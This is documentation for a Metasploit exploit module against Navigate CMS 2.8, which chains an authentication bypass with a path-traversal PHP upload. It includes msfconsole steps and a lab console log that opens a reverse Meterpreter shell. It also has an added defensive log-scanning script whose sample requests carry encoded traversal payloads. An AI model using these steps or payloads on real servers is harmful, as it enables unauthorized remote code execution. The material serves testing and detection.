Navigate CMS RCE

documentation/modules/exploit/multi/http/navigate_cms_rce.md

Description

This module exploits insufficient sanitization in the database::protect method of Navigate CMS versions 2.8 and prior to bypass authentication. It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together, these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely.

This module was tested against Navigate CMS 2.8.
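
A log check a defender could run for the upload stage described above, as an added example (not part of the module or its documentation): it flags requests to navigate_upload.php whose query parameters decode, after repeated URL-decoding, to a ".." path segment. The combined log format, the /navigate/ install path and the "dest" parameter name are assumptions made for the constructed sample; a traversal carried in a POST body would not appear in access logs.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache combined log format (not from the page).
# The /navigate/ path and the "dest" parameter are hypothetical.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Sep/2018:22:20:01 +0200] "GET /navigate/login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [26/Sep/2018:22:21:40 +0200] "POST /navigate/navigate_upload.php?dest=logo.png HTTP/1.1" 200 31 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Sep/2018:22:24:58 +0200] "POST /navigate/navigate_upload.php?dest=..%2F..%2Fx.php HTTP/1.1" 200 31 "-" "-"
198.51.100.7 - - [26/Sep/2018:22:24:59 +0200] "POST /navigate/navigate_upload.php?dest=%252e%252e%255cx.php HTTP/1.1" 200 31 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def fully_decode(value, max_rounds=5):
    """URL-decode repeatedly so double-encoded sequences are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    """True if any path segment (split on / or \\) is exactly '..'."""
    return ".." in re.split(r"[\\/]", fully_decode(value))

def find_suspicious_uploads(log_text, script="navigate_upload.php"):
    """Return one record per request to `script` with a traversing parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, when, method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        flagged = [k for k, v in parse_qsl(url.query, keep_blank_values=True)
                   if has_traversal(v)]
        if flagged:
            hits.append({"client": client, "time": when, "method": method,
                         "status": int(status), "params": flagged})
    return hits

if __name__ == "__main__":
    for hit in find_suspicious_uploads(SAMPLE_LOG):
        print(hit)
```
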

Verification Steps

Navigate CMS 2.8

  1. Install Navigate CMS
  2. Start msfconsole
  3. use exploit/multi/http/navigate_cms_rce
  4. set RHOST <rhost>
  5. check
  6. You should see "The target appears to be vulnerable."
  7. exploit
  8. You should get a meterpreter session

Scenarios

msf > use exploit/multi/http/navigate_cms_rce
msf exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45
RHOST => 192.168.178.45
msf exploit(multi/http/navigate_cms_rce) > check
[*] 192.168.178.45:80 The target appears to be vulnerable.
msf exploit(multi/http/navigate_cms_rce) > exploit

[*] Started reverse TCP handler on 192.168.178.35:4444 
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (37775 bytes) to 192.168.178.45
[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200

meterpreter >